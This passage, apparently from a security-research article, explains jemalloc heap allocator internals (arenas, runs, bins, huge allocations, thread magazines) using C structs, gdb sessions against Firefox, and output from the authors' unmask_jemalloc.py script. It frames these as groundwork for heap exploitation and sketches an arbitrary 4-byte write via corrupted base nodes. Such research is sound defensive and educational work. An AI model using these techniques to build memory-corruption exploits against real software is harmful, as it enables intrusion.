/* A list of the corresponding arena's dirty chunks. */
|
|
ql_elm(arena_chunk_t) link_dirty;
|
|
|
|
/*
|
|
* Whether this chunk contained at some point one or more dirty pages.
|
|
*/
|
|
bool dirtied;
|
|
|
|
/* This chunk's number of dirty pages. */
|
|
size_t ndirty;
|
|
|
|
/*
|
|
* A chunk map element corresponds to a page of this chunk. The map
|
|
* keeps track of free and large/small regions.
|
|
*/
|
|
arena_chunk_map_t map[];
|
|
};
|
|
|
|
|
|
The main use of chunk maps in combination with the memory alignment of the
|
|
chunks is to enable constant time access to the management metadata of free
|
|
and large/small heap allocations (regions).
|
|
|
|
|
|
------[ 2.1.2 - Arenas (arena_t)
|
|
|
|
An arena is a structure that manages the memory areas jemalloc divides
|
|
into chunks. Arenas can span more than one chunk, and depending on the
|
|
size of the chunks, more than one page as well. As we have already
|
|
mentioned, arenas are used to mitigate lock contention problems between
|
|
threads. Therefore, allocations and deallocations from a thread always
|
|
happen on the same arena. Theoretically, the number of arenas is in direct
|
|
relation to the need for concurrency in memory allocation. In practice the
|
|
number of arenas depends on the jemalloc variant we deal with. For example,
|
|
in Firefox's jemalloc there is only one arena. In the case of single-CPU
|
|
systems there is also only one arena. In SMP systems the number of arenas
|
|
is equal to either two (in FreeBSD 8.2) or four (in the standalone variant)
|
|
times the number of available CPU cores. Of course, there is always at
|
|
least one arena.
|
|
|
|
Debugging the standalone variant with gdb:
|
|
|
|
|
|
gdb $ print ncpus
|
|
$86 = 0x4
|
|
gdb $ print narenas
|
|
$87 = 0x10
|
|
|
|
|
|
Arenas are the central jemalloc data structures as they are used to manage
|
|
the chunks (and the underlying pages) that are responsible for the small
|
|
and large allocation size classes. Specifically, the arena structure is
|
|
defined as follows:
|
|
|
|
|
|
[2-2]
|
|
|
|
typedef struct arena_s arena_t;
|
|
struct arena_s
|
|
{
|
|
/* This arena's index in the arenas array. */
|
|
unsigned ind;
|
|
|
|
/* Number of threads assigned to this arena. */
|
|
unsigned nthreads;
|
|
|
|
/* Mutex to protect certain operations. */
|
|
malloc_mutex_t lock;
|
|
|
|
/*
|
|
* Chunks that contain dirty pages managed by this arena. When jemalloc
|
|
* requires new pages these are allocated first from the dirty pages.
|
|
*/
|
|
ql_head(arena_chunk_t) chunks_dirty;
|
|
|
|
/*
|
|
* Each arena has a spare chunk in order to cache the most recently
|
|
* freed chunk.
|
|
*/
|
|
arena_chunk_t *spare;
|
|
|
|
/* The number of pages in this arena's active runs. */
|
|
size_t nactive;
|
|
|
|
/* The number of pages in unused runs that are potentially dirty. */
|
|
size_t ndirty;
|
|
|
|
/* The number of pages this arena's threads are attempting to purge. */
|
|
size_t npurgatory;
|
|
|
|
/*
|
|
* Ordered tree of this arena's available clean runs, i.e. runs
|
|
* associated with clean pages.
|
|
*/
|
|
arena_avail_tree_t runs_avail_clean;
|
|
|
|
/*
|
|
* Ordered tree of this arena's available dirty runs, i.e. runs
|
|
* associated with dirty pages.
|
|
*/
|
|
arena_avail_tree_t runs_avail_dirty;
|
|
|
|
/*
|
|
* Bins are used to store structures of free regions managed by this
|
|
* arena.
|
|
*/
|
|
arena_bin_t bins[];
|
|
};
|
|
|
|
|
|
All in all a fairly simple structure. As it is clear from the above
|
|
structure, the allocator contains a global array of arenas and an unsigned
|
|
integer representing the number of these arenas:
|
|
|
|
|
|
arena_t **arenas;
|
|
unsigned narenas;
|
|
|
|
|
|
And using gdb we can see the following:
|
|
|
|
|
|
gdb $ x/x arenas
|
|
0xb7800cc0: 0xb7800740
|
|
gdb $ print arenas[0]
|
|
$4 = (arena_t *) 0xb7800740
|
|
gdb $ x/x &narenas
|
|
0xb7fdfdc4 <narenas>: 0x00000010
|
|
|
|
|
|
At 0xb7800740 we have 'arenas[0]', that is the first arena, and at
|
|
0xb7fdfdc4 we have the number of arenas, i.e 16.
|
|
|
|
|
|
------[ 2.1.3 - Runs (arena_run_t)
|
|
|
|
Runs are further memory denominations of the memory divided by jemalloc
|
|
into chunks. Runs exist only for small and large allocations (see
|
|
subsection 2.1.1), but not for huge allocations. In essence, a chunk
|
|
is broken into several runs. Each run is actually a set of one or more
|
|
contiguous pages (but a run cannot be smaller than one page). Therefore,
|
|
they are aligned to multiples of the page size. The runs themselves may
|
|
be non-contiguous but they are as close as possible due to the tree search
|
|
heuristics implemented by jemalloc.
|
|
|
|
The main responsibility of a run is to keep track of the state (i.e. free
|
|
or used) of end user memory allocations, or regions as these are called in
|
|
jemalloc terminology. Each run holds regions of a specific size (however
|
|
within the small and large size classes as we have mentioned) and their
|
|
state is tracked with a bitmask. This bitmask is part of a run's metadata;
|
|
these metadata are defined with the following structure:
|
|
|
|
|
|
[2-3]
|
|
|
|
typedef struct arena_run_s arena_run_t;
|
|
struct arena_run_s
|
|
{
|
|
/*
|
|
* The bin that this run is associated with. See 2.1.5 for details on
|
|
* the bin structures.
|
|
*/
|
|
arena_bin_t *bin;
|
|
|
|
/*
|
|
* The index of the next region of the run that is free. On the FreeBSD
|
|
* and Firefox flavors of jemalloc this variable is named regs_minelm.
|
|
*/
|
|
uint32_t nextind;
|
|
|
|
/* The number of free regions in the run. */
|
|
unsigned nfree;
|
|
|
|
/*
|
|
* Bitmask for the regions in this run. Each bit corresponds to one
|
|
* region. A 0 means the region is used, and an 1 bit value that the
|
|
* corresponding region is free. The variable nextind (or regs_minelm
|
|
* on FreeBSD and Firefox) is the index of the first non-zero element
|
|
* of this array.
|
|
*/
|
|
unsigned regs_mask[];
|
|
};
|
|
|
|
|
|
Don't forget to re-read the comments ;)
|
|
|
|
|
|
------[ 2.1.4 - Regions/Allocations
|
|
|
|
In jemalloc the term 'regions' applies to the end user memory areas
|
|
returned by malloc(3). As we have briefly mentioned earlier, regions are
|
|
divided into three classes according to their size, namely a) small/medium,
|
|
b) large and c) huge.
|
|
|
|
Huge regions are considered those that are bigger than the chunk size minus
|
|
the size of some jemalloc headers. For example, in the case that the chunk
|
|
size is 4 MB (4096 KB) then a huge region is an allocation greater than
|
|
4078 KB. Small/medium are the regions that are smaller than a page. Large
|
|
are the regions that are smaller than the huge regions (chunk size minus
|
|
some headers) and also larger than the small/medium regions (page size).
|
|
|
|
Huge regions have their own metadata and are managed separately from
|
|
small/medium and large regions. Specifically, they are managed by a
|
|
global to the allocator red-black tree and they have their own dedicated
|
|
and contiguous chunks. Large regions have their own runs, that is each
|
|
large allocation has a dedicated run. Their metadata are situated on
|
|
the corresponding arena chunk header. Small/medium regions are placed
|
|
on different runs according to their specific size. As we have seen in
|
|
2.1.3, each run has its own header in which there is a bitmask array
|
|
specifying the free and the used regions in the run.
|
|
|
|
In the standalone flavor of jemalloc the smallest run is that for regions
|
|
of size 4 bytes. The next run is for regions of size 8 bytes, the next
|
|
for 16 bytes, and so on.
|
|
|
|
When we do not mention it specifically, we deal with small/medium and
|
|
large region classes. We investigate the huge region size class separately
|
|
in subsection 2.1.6.
|
|
|
|
|
|
------[ 2.1.5 - Bins (arena_bin_t)
|
|
|
|
Bins are used by jemalloc to store free regions. Bins organize the free
|
|
regions via runs and also keep metadata about their regions, like for
|
|
example the size class, the total number of regions, etc. A specific bin
|
|
may be associated with several runs, however a specific run can only be
|
|
associated with a specific bin, i.e. there is an one-to-many correspondence
|
|
between bins and runs. Bins have their associated runs organized in a tree.
|
|
|
|
Each bin has an associated size class and stores/manages regions of this
|
|
size class. A bin's regions are managed and accessed through the bin's
|
|
runs. Each bin has a member element representing the most recently used run
|
|
of the bin, called 'current run' with the variable name runcur. A bin also
|
|
has a tree of runs with available/free regions. This tree is used when the
|
|
current run of the bin is full, that is it doesn't have any free regions.
|
|
|
|
A bin structure is defined as follows:
|
|
|
|
|
|
[2-4]
|
|
|
|
typedef struct arena_bin_s arena_bin_t;
|
|
struct arena_bin_s
|
|
{
|
|
/*
|
|
* Operations on the runs (including the current run) of the bin
|
|
* are protected via this mutex.
|
|
*/
|
|
malloc_mutex_t lock;
|
|
|
|
/*
|
|
* The current run of the bin that manages regions of this bin's size
|
|
* class.
|
|
*/
|
|
arena_run_t *runcur;
|
|
|
|
/*
|
|
* The tree of the bin's associated runs (all responsible for regions
|
|
* of this bin's size class of course).
|
|
*/
|
|
arena_run_tree_t runs;
|
|
|
|
/* The size of this bin's regions. */
|
|
size_t reg_size;
|
|
|
|
/*
|
|
* The total size of a run of this bin. Remember that each run may be
|
|
* comprised of more than one pages.
|
|
*/
|
|
size_t run_size;
|
|
|
|
/* The total number of regions in a run of this bin. */
|
|
uint32_t nregs;
|
|
|
|
/*
|
|
* The total number of elements in the regs_mask array of a run of this
|
|
* bin. See 2.1.3 for more information on regs_mask.
|
|
*/
|
|
uint32_t regs_mask_nelms;
|
|
|
|
/*
|
|
* The offset of the first region in a run of this bin. This can be
|
|
* non-zero due to alignment requirements.
|
|
*/
|
|
uint32_t reg0_offset;
|
|
};
|
|
|
|
|
|
As an example, consider the following three allocations and that the
|
|
jemalloc flavor under investigation has 2 bytes as the smallest possible
|
|
allocation size (file test-bins.c in the code archive, example run on
|
|
FreeBSD):
|
|
|
|
|
|
one = malloc(2);
|
|
two = malloc(8);
|
|
three = malloc(16);
|
|
|
|
|
|
Using gdb let's explore jemalloc's structures. First let's see the runs
|
|
that the above allocations created in their corresponding bins:
|
|
|
|
|
|
gdb $ print arenas[0].bins[0].runcur
|
|
$25 = (arena_run_t *) 0xb7d01000
|
|
gdb $ print arenas[0].bins[1].runcur
|
|
$26 = (arena_run_t *) 0x0
|
|
gdb $ print arenas[0].bins[2].runcur
|
|
$27 = (arena_run_t *) 0xb7d02000
|
|
gdb $ print arenas[0].bins[3].runcur
|
|
$28 = (arena_run_t *) 0xb7d03000
|
|
gdb $ print arenas[0].bins[4].runcur
|
|
$29 = (arena_run_t *) 0x0
|
|
|
|
|
|
Now let's see the size classes of these bins:
|
|
|
|
|
|
gdb $ print arenas[0].bins[0].reg_size
|
|
$30 = 0x2
|
|
gdb $ print arenas[0].bins[1].reg_size
|
|
$31 = 0x4
|
|
gdb $ print arenas[0].bins[2].reg_size
|
|
$32 = 0x8
|
|
gdb $ print arenas[0].bins[3].reg_size
|
|
$33 = 0x10
|
|
gdb $ print arenas[0].bins[4].reg_size
|
|
$34 = 0x20
|
|
|
|
|
|
We can see that our three allocations of sizes 2, 8 and 16 bytes resulted
|
|
in jemalloc creating runs for these size classes. Specifically, 'bin[0]'
|
|
is responsible for the size class 2 and its current run is at 0xb7d01000,
|
|
'bin[1]' is responsible for the size class 4 and doesn't have a current
|
|
run since no allocations of size 4 were made, 'bin[2]' is responsible
|
|
for the size class 8 with its current run at 0xb7d02000, and so on. In the
|
|
code archive you can find a Python script for gdb named unmask_jemalloc.py
|
|
for easily enumerating the size of bins and other internal information in
|
|
the various jemalloc flavors (see 2.1.8 for a sample run).
|
|
|
|
At this point we should mention that in jemalloc an allocation of zero
|
|
bytes (that is a malloc(0) call) will return a region of the smallest size
|
|
class; in the above example a region of size 2. The smallest size class
|
|
depends on the flavor of jemalloc. For example, in the standalone flavor it
|
|
is 4 bytes.
|
|
|
|
The following diagram summarizes our analysis of jemalloc up to this point:
|
|
|
|
.----------------------------------. .---------------------------.
|
|
.----------------------------------. | +--+-----> arena_chunk_t |
|
|
.---------------------------------. | | | | |
|
|
| arena_t | | | | | .---------------------. |
|
|
| | | | | | | | |
|
|
| .--------------------. | | | | | | arena_run_t | |
|
|
| | arena_chunk_t list |-----+ | | | | | | | |
|
|
| `--------------------' | | | | | | | .-----------. | |
|
|
| | | | | | | | | page | | |
|
|
| arena_bin_t bins[]; | | | | | | | +-----------+ | |
|
|
| .------------------------. | | | | | | | | region | | |
|
|
| | bins[0] ... bins[27] | | | | | | | | +-----------+ | |
|
|
| `------------------------' | | |.' | | | | region | | |
|
|
| | | |.' | | | +-----------+ | |
|
|
`-----+----------------------+----' | | | | region | | |
|
|
| | | | | +-----------+ | |
|
|
| | | | | . . . | |
|
|
| v | | | .-----------. | |
|
|
| .-------------------. | | | | page | | |
|
|
| | .---------------. | | | | +-----------+ | |
|
|
| | | arena_chunk_t |-+---+ | | | region | | |
|
|
| | `---------------' | | | +-----------+ | |
|
|
| [2-5] | .---------------. | | | | region | | |
|
|
| | | arena_chunk_t | | | | +-----------+ | |
|
|
| | `---------------' | | | | region | | |
|
|
| | . . . | | | +-----------+ | |
|
|
| | .---------------. | | | | |
|
|
| | | arena_chunk_t | | | `---------------------' |
|
|
| | `---------------' | | [2-6] |
|
|
| | . . . | | .---------------------. |
|
|
| `-------------------' | | | |
|
|
| +----+--+---> arena_run_t | |
|
|
| | | | | |
|
|
+----------+ | | | .-----------. | |
|
|
| | | | | page | | |
|
|
| | | | +-----------+ | |
|
|
| | | | | region | | |
|
|
v | | | +-----------+ | |
|
|
.--------------------------. | | | | region | | |
|
|
| arena_bin_t | | | | +-----------+ | |
|
|
| bins[0] (size 8) | | | | | region | | |
|
|
| | | | | +-----------+ | |
|
|
| .----------------------. | | | | . . . | |
|
|
| | arena_run_t *runcur; |-+---------+ | | .-----------. | |
|
|
| `----------------------' | | | | page | | |
|
|
`--------------------------' | | +-----------+ | |
|
|
| | | region | | |
|
|
| | +-----------+ | |
|
|
| | | region | | |
|
|
| | +-----------+ | |
|
|
| | | region | | |
|
|
| | +-----------+ | |
|
|
| | | |
|
|
| `---------------------' |
|
|
`---------------------------'
|
|
|
|
|
|
------[ 2.1.6 - Huge allocations
|
|
|
|
Huge allocations are not very interesting for the attacker but they are an
|
|
integral part of jemalloc which may affect the exploitation process. Simply
|
|
put, huge allocations are represented by 'extent_node_t' structures that
|
|
are ordered in a global red black tree which is common to all threads.
|
|
|
|
|
|
[2-7]
|
|
|
|
/* Tree of extents. */
|
|
typedef struct extent_node_s extent_node_t;
|
|
struct extent_node_s {
|
|
#ifdef MALLOC_DSS
|
|
/* Linkage for the size/address-ordered tree. */
|
|
rb_node(extent_node_t) link_szad;
|
|
#endif
|
|
|
|
/* Linkage for the address-ordered tree. */
|
|
rb_node(extent_node_t) link_ad;
|
|
|
|
/* Pointer to the extent that this tree node is responsible for. */
|
|
void *addr;
|
|
|
|
/* Total region size. */
|
|
size_t size;
|
|
};
|
|
typedef rb_tree(extent_node_t) extent_tree_t;
|
|
|
|
|
|
The 'extent_node_t' structures are allocated in small memory regions
|
|
called base nodes. Base nodes do not affect the layout of end user heap
|
|
allocations since they are served either by the DSS or by individual
|
|
memory mappings acquired by 'mmap()'. The actual method used to allocate
|
|
free space depends on how jemalloc was compiled with 'mmap()' being
|
|
the default.
|
|
|
|
|
|
/* Allocate an extent node with which to track the chunk. */
|
|
node = base_node_alloc();
|
|
...
|
|
|
|
ret = chunk_alloc(csize, zero);
|
|
...
|
|
|
|
/* Insert node into huge. */
|
|
node->addr = ret;
|
|
node->size = csize;
|
|
...
|
|
|
|
malloc_mutex_lock(&huge_mtx);
|
|
extent_tree_ad_insert(&huge, node);
|
|
|
|
|
|
The most interesting thing about huge allocations is the fact that free
|
|
base nodes are kept in a simple array of pointers called 'base_nodes'. The
|
|
aforementioned array, although defined as a simple pointer, it's handled
|
|
as if it was a two dimensional array holding pointers to available base
|
|
nodes.
|
|
|
|
|
|
static extent_node_t *base_nodes;
|
|
...
|
|
|
|
static extent_node_t *
|
|
base_node_alloc(void)
|
|
{
|
|
extent_node_t *ret;
|
|
|
|
malloc_mutex_lock(&base_mtx);
|
|
if (base_nodes != NULL) {
|
|
ret = base_nodes;
|
|
base_nodes = *(extent_node_t **)ret;
|
|
...
|
|
}
|
|
...
|
|
}
|
|
|
|
static void
|
|
base_node_dealloc(extent_node_t *node)
|
|
{
|
|
malloc_mutex_lock(&base_mtx);
|
|
*(extent_node_t **)node = base_nodes;
|
|
base_nodes = node;
|
|
...
|
|
}
|
|
|
|
|
|
Taking into account how 'base_node_alloc()' works, it's obvious that if
|
|
an attacker corrupts the pages that contain the base node pointers, she
|
|
can force jemalloc to use an arbitrary address as a base node pointer. This
|
|
itself can lead to interesting scenarios but they are out of the scope
|
|
of this article since the chances of achieving something like this are
|
|
quite low. Nevertheless, a quick review of the code reveals that one
|
|
may be able to achieve this goal by forcing huge allocations once she
|
|
controls the physically last region of an arena. The attack is possible
|
|
if and only if the mappings that will hold the base pointers are allocated
|
|
right after the attacker controlled region.
|
|
|
|
A careful reader would have noticed that if an attacker manages to pass
|
|
a controlled value as the first argument to 'base_node_dealloc()' she
|
|
can get a '4bytes anywhere' result. Unfortunately, as far as the authors
|
|
can see, this is possible only if the global red black tree holding the
|
|
huge allocations is corrupted. This situation is far more difficult to
|
|
achieve than the one described in the previous paragraph. Nevertheless,
|
|
we would really like to hear from anyone that manages to do so.
|
|
|
|
|
|
------[ 2.1.7 - Thread caches (tcache_t)
|
|
|
|
In the previous paragraphs we mentioned how jemalloc allocates new arenas
|
|
at will in order to avoid lock contention. In this section we will focus on
|
|
the mechanisms that are activated on multicore systems and multithreaded
|
|
programs.
|
|
|
|
Let's set the following straight:
|
|
|
|
1) A multicore system is the reason jemalloc allocates more than one arena.
|
|
On a unicore system there's only one available arena, even on multithreaded
|
|
applications. However, the Firefox jemalloc variant has just one arena
|
|
hardcoded, therefore it has no thread caches.
|
|
|
|
2) On a multicore system, even if the target application runs on a single
|
|
thread, more than one arenas are used.
|
|
|
|
No matter what the number of cores on the system is, a multithreaded
|
|
application utilizing jemalloc will make use of the so called 'magazines'
|
|
(also called 'tcaches' on newer versions of jemalloc). Magazines (tcaches)
|
|
are thread local structures used to avoid thread blocking problems.
|
|
Whenever a thread wishes to allocate a memory region, jemalloc will use
|
|
those thread specific data structures instead of following the normal code
|
|
path.
|
|
|
|
|
|
void *
|
|
arena_malloc(arena_t *arena, size_t size, bool zero)
|
|
{
|
|
...
|
|
|
|
if (size <= bin_maxclass) {
|
|
#ifdef MALLOC_MAG
|
|
if (__isthreaded && opt_mag) {
|
|
mag_rack_t *rack = mag_rack;
|
|
if (rack == NULL) {
|
|
rack = mag_rack_create(arena);
|
|
...
|
|
|
|
return (mag_rack_alloc(rack, size, zero));
|
|
}
|
|
else
|
|
#endif
|
|
return (arena_malloc_small(arena, size, zero));
|
|
}
|
|
...
|
|
}
|
|
|
|
|
|
The 'opt_mag' variable is true by default. The variable '__isthreaded' is
|
|
exported by 'libthr', the pthread implementation for FreeBSD and is set to
|
|
1 on a call to 'pthread_create()'. Obviously, the rest of the details are
|
|
out of the scope of this article.
|
|
|
|
In this section we will analyze thread magazines, but the exact same
|
|
principles apply on the tcaches (the change in the nomenclature is probably
|
|
the most notable difference between them).
|
|
|
|
The behavior of thread magazines is affected by the following macros that
|
|
are _defined_:
|
|
|
|
MALLOC_MAG - Make use of thread magazines.
|
|
|
|
MALLOC_BALANCE - Balance arena usage using a simple linear random number
|
|
generator (have a look at 'choose_arena()').
|
|
|
|
The following constants are _undefined_:
|
|
|
|
NO_TLS - TLS _is_ available on __i386__
|
|
|
|
Furthermore, 'opt_mag', the jemalloc runtime option controlling thread
|
|
magazine usage, is, as we mentioned earlier, enabled by default.
|
|
|
|
The following figure depicts the relationship between the various thread
|
|
magazines' structures.
|
|
|
|
|
|
.-------------------------------------------.
|
|
| mag_rack_t |
|
|
| |
|
|
| bin_mags_t bin_mags[]; |
|
|
| |
|
|
| .-------------------------------------. |
|
|
| | bin_mags[0] ... bin_mags[nbins - 1] | |
|
|
| `-------------------------------------' |
|
|
`--------|----------------------------------'
|
|
|
|
|
| .------------------.
|
|
| +----------->| mag_t |
|
|
v | | |
|
|
.----------------------. | | void *rounds[] |
|
|
| bin_mags_t | | | ... |
|
|
| | | `------------------'
|
|
| .----------------. | |
|
|
| | mag_t *curmag; |-----------+
|
|
| `----------------' |
|
|
| ... |
|
|
`----------------------'
|
|
|
|
|
|
The core of the aforementioned thread local metadata is the 'mag_rack_t'. A
|
|
'mag_rack_t' is a simplified equivalent of an arena. It is composed of a
|
|
single array of 'bin_mags_t' structures. Each thread in a program is
|
|
associated with a private 'mag_rack_t' which has a lifetime equal to the
|
|
application's.
|
|
|
|
|
|
typedef struct mag_rack_s mag_rack_t;
|
|
struct mag_rack_s {
|
|
bin_mags_t bin_mags[1]; /* Dynamically sized. */
|
|
};
|
|
|
|
|
|
Bins belonging to magazine racks are represented by 'bin_mags_t' structures
|
|
(notice the plural form).
|
|
|
|
|
|
/*
|
|
* Magazines are lazily allocated, but once created, they remain until the
|
|
* associated mag_rack is destroyed.
|
|
*/
|
|
typedef struct bin_mags_s bin_mags_t;
|
|
struct bin_mags_s {
|
|
mag_t *curmag;
|
|
mag_t *sparemag;
|
|
};
|
|
|
|
typedef struct mag_s mag_t;
|
|
struct mag_s {
|
|
size_t binind; /* Index of associated bin. */
|
|
size_t nrounds;
|
|
void *rounds[1]; /* Dynamically sized. */
|
|
};
|
|
|
|
|
|
Just like a normal bin is associated with a run, a 'bin_mags_t' structure
|
|
is associated with a magazine pointed by 'curmag' (recall 'runcur'). A
|
|
magazine is nothing special but a simple array of void pointers which hold
|
|
memory addresses of preallocated memory regions which are exclusively used
|
|
by a single thread. Magazines are populated in function 'mag_load()' as
|
|
seen below.
|
|
|
|
|
|
void
|
|
mag_load(mag_t *mag)
|
|
{
|
|
arena_t *arena;
|
|
arena_bin_t *bin;
|
|
arena_run_t *run;
|
|
void *round;
|
|
size_t i;
|
|
|
|
/* Pick a random arena and the bin responsible for servicing
|
|
* the required size class.
|
|
*/
|
|
arena = choose_arena();
|
|
bin = &arena->bins[mag->binind];
|
|
...
|
|
|
|
for (i = mag->nrounds; i < max_rounds; i++) {
|
|
...
|
|
|
|
if ((run = bin->runcur) != NULL && run->nfree > 0)
|
|
round = arena_bin_malloc_easy(arena, bin, run); /* [3-23] */
|
|
else
|
|
round = arena_bin_malloc_hard(arena, bin); /* [3-24] */
|
|
|
|
if (round == NULL)
|
|
break;
|
|
|
|
/* Each 'rounds' holds a preallocated memory region. */
|
|
mag->rounds[i] = round;
|
|
}
|
|
|
|
...
|
|
mag->nrounds = i;
|
|
}
|
|
|
|
|
|
When a thread calls 'malloc()', the call chain eventually reaches
|
|
'mag_rack_alloc()' and then 'mag_alloc()'.
|
|
|
|
|
|
/* Just return the next available void pointer. It points to one of the
|
|
* preallocated memory regions.
|
|
*/
|
|
void *
|
|
mag_alloc(mag_t *mag)
|
|
{
|
|
if (mag->nrounds == 0)
|
|
return (NULL);
|
|
mag->nrounds--;
|
|
|
|
return (mag->rounds[mag->nrounds]);
|
|
}
|
|
|
|
|
|
The most notable thing about magazines is the fact that 'rounds', the array
|
|
of void pointers, as well as all the related thread metadata (magazine
|
|
racks, magazine bins and so on) are allocated by normal calls to functions
|
|
'arena_bin_malloc_xxx()' ([3-23], [3-24]). This results in the thread
|
|
metadata lying around normal memory regions.
|
|
|
|
|
|
------[ 2.1.8 - Unmask jemalloc
|
|
|
|
As we are sure you are all aware, since version 7.0, gdb can be scripted
|
|
with Python. In order to unmask and bring to light the internals of the
|
|
various jemalloc flavors, we have developed a Python script for gdb
|
|
appropriately named unmask_jemalloc.py. The following is a sample run of
|
|
the script on Firefox 11.0 on Linux x86 (edited for readability):
|
|
|
|
|
|
$ ./firefox-bin &
|
|
|
|
$ gdb -x ./gdbinit -p `ps x | grep firefox | grep -v grep \
|
|
| grep -v debug | awk '{print $1}'`
|
|
|
|
GNU gdb (GDB) 7.4-debian
|
|
...
|
|
Attaching to process 3493
|
|
add symbol table from file "/dbg/firefox-latest-symbols/firefox-bin.dbg" at
|
|
.text_addr = 0x80494b0
|
|
add symbol table from file "/dbg/firefox-latest-symbols/libxul.so.dbg" at
|
|
.text_addr = 0xb5b9a9d0
|
|
...
|
|
[Thread 0xa4ffdb70 (LWP 3533) exited]
|
|
[Thread 0xa57feb70 (LWP 3537) exited]
|
|
[New Thread 0xa57feb70 (LWP 3556)]
|
|
[Thread 0xa57feb70 (LWP 3556) exited]
|
|
|
|
gdb $ source unmask_jemalloc.py
|
|
gdb $ unmask_jemalloc runs
|
|
|
|
[jemalloc] [number of arenas: 1]
|
|
[jemalloc] [number of bins: 24]
|
|
[jemalloc] [no magazines/thread caches detected]
|
|
|
|
[jemalloc] [arena #00] [bin #00] [region size: 0x0004]
|
|
[current run at: 0xa52d9000]
|
|
[jemalloc] [arena #00] [bin #01] [region size: 0x0008]
|
|
[current run at: 0xa37c8000]
|
|
[jemalloc] [arena #00] [bin #02] [region size: 0x0010]
|
|
[current run at: 0xa372c000]
|
|
[jemalloc] [arena #00] [bin #03] [region size: 0x0020]
|
|
[current run at: 0xa334d000]
|
|
[jemalloc] [arena #00] [bin #04] [region size: 0x0030]
|
|
[current run at: 0xa3347000]
|
|
[jemalloc] [arena #00] [bin #05] [region size: 0x0040]
|
|
[current run at: 0xa334a000]
|
|
[jemalloc] [arena #00] [bin #06] [region size: 0x0050]
|
|
[current run at: 0xa3732000]
|
|
[jemalloc] [arena #00] [bin #07] [region size: 0x0060]
|
|
[current run at: 0xa3701000]
|
|
[jemalloc] [arena #00] [bin #08] [region size: 0x0070]
|
|
[current run at: 0xa3810000]
|
|
[jemalloc] [arena #00] [bin #09] [region size: 0x0080]
|
|
[current run at: 0xa3321000]
|
|
[jemalloc] [arena #00] [bin #10] [region size: 0x00f0]
|
|
[current run at: 0xa57c7000]
|
|
[jemalloc] [arena #00] [bin #11] [region size: 0x0100]
|
|
[current run at: 0xa37e9000]
|
|
[jemalloc] [arena #00] [bin #12] [region size: 0x0110]
|
|
[current run at: 0xa5a9b000]
|
|
[jemalloc] [arena #00] [bin #13] [region size: 0x0120]
|
|
[current run at: 0xa56ea000]
|
|
[jemalloc] [arena #00] [bin #14] [region size: 0x0130]
|
|
[current run at: 0xa3709000]
|
|
[jemalloc] [arena #00] [bin #15] [region size: 0x0140]
|
|
[current run at: 0xa382c000]
|
|
[jemalloc] [arena #00] [bin #16] [region size: 0x0150]
|
|
[current run at: 0xa39da000]
|
|
[jemalloc] [arena #00] [bin #17] [region size: 0x0160]
|
|
[current run at: 0xa56ee000]
|
|
[jemalloc] [arena #00] [bin #18] [region size: 0x0170]
|
|
[current run at: 0xa3849000]
|
|
[jemalloc] [arena #00] [bin #19] [region size: 0x0180]
|
|
[current run at: 0xa3a21000]
|
|
[jemalloc] [arena #00] [bin #20] [region size: 0x01f0]
|
|
[current run at: 0xafc51000]
|
|
[jemalloc] [arena #00] [bin #21] [region size: 0x0200]
|
|
[current run at: 0xa3751000]
|
|
[jemalloc] [arena #00] [bin #22] [region size: 0x0400]
|
|
[current run at: 0xa371d000]
|
|
[jemalloc] [arena #00] [bin #23] [region size: 0x0800]
|
|
[current run at: 0xa370d000]
|
|
|
|
[jemalloc] [run 0xa3347000] [from 0xa3347000 to 0xa3348000L]
|
|
[jemalloc] [run 0xa371d000] [from 0xa371d000 to 0xa3725000L]
|
|
[jemalloc] [run 0xa3321000] [from 0xa3321000 to 0xa3323000L]
|
|
[jemalloc] [run 0xa334a000] [from 0xa334a000 to 0xa334b000L]
|
|
[jemalloc] [run 0xa370d000] [from 0xa370d000 to 0xa3715000L]
|
|
[jemalloc] [run 0xa3709000] [from 0xa3709000 to 0xa370d000L]
|
|
[jemalloc] [run 0xa37c8000] [from 0xa37c8000 to 0xa37c9000L]
|
|
[jemalloc] [run 0xa5a9b000] [from 0xa5a9b000 to 0xa5a9f000L]
|
|
[jemalloc] [run 0xa3a21000] [from 0xa3a21000 to 0xa3a27000L]
|
|
[jemalloc] [run 0xa382c000] [from 0xa382c000 to 0xa3831000L]
|
|
[jemalloc] [run 0xa3701000] [from 0xa3701000 to 0xa3702000L]
|
|
[jemalloc] [run 0xa57c7000] [from 0xa57c7000 to 0xa57ca000L]
|
|
[jemalloc] [run 0xa56ee000] [from 0xa56ee000 to 0xa56f3000L]
|
|
[jemalloc] [run 0xa39da000] [from 0xa39da000 to 0xa39df000L]
|
|
[jemalloc] [run 0xa37e9000] [from 0xa37e9000 to 0xa37ed000L]
|
|
[jemalloc] [run 0xa3810000] [from 0xa3810000 to 0xa3812000L]
|
|
[jemalloc] [run 0xa3751000] [from 0xa3751000 to 0xa3759000L]
|
|
[jemalloc] [run 0xafc51000] [from 0xafc51000 to 0xafc58000L]
|
|
[jemalloc] [run 0xa334d000] [from 0xa334d000 to 0xa334e000L]
|
|
[jemalloc] [run 0xa372c000] [from 0xa372c000 to 0xa372d000L]
|
|
[jemalloc] [run 0xa52d9000] [from 0xa52d9000 to 0xa52da000L]
|
|
[jemalloc] [run 0xa56ea000] [from 0xa56ea000 to 0xa56ee000L]
|
|
[jemalloc] [run 0xa3732000] [from 0xa3732000 to 0xa3733000L]
|
|
[jemalloc] [run 0xa3849000] [from 0xa3849000 to 0xa384e000L]
|
|
|
|
|
|
There is also preliminary support for Mac OS X (x86_64), tested on Lion
|
|
10.7.3 with Firefox 11.0. Also, note that Apple's gdb does not have Python
|
|
scripting support, so the following was obtained with a custom-compiled
|
|
gdb:
|
|
|
|
|
|
$ open firefox-11.0.app
|
|
|
|
$ gdb -nx -x ./gdbinit -p 837
|
|
|
|
...
|
|
Attaching to process 837
|
|
[New Thread 0x2003 of process 837]
|
|
[New Thread 0x2103 of process 837]
|
|
[New Thread 0x2203 of process 837]
|
|
[New Thread 0x2303 of process 837]
|
|
[New Thread 0x2403 of process 837]
|
|
[New Thread 0x2503 of process 837]
|
|
[New Thread 0x2603 of process 837]
|
|
[New Thread 0x2703 of process 837]
|
|
[New Thread 0x2803 of process 837]
|
|
[New Thread 0x2903 of process 837]
|
|
[New Thread 0x2a03 of process 837]
|
|
[New Thread 0x2b03 of process 837]
|
|
[New Thread 0x2c03 of process 837]
|
|
[New Thread 0x2d03 of process 837]
|
|
[New Thread 0x2e03 of process 837]
|
|
Reading symbols from
|
|
/dbg/firefox-11.0.app/Contents/MacOS/firefox...done
|
|
Reading symbols from
|
|
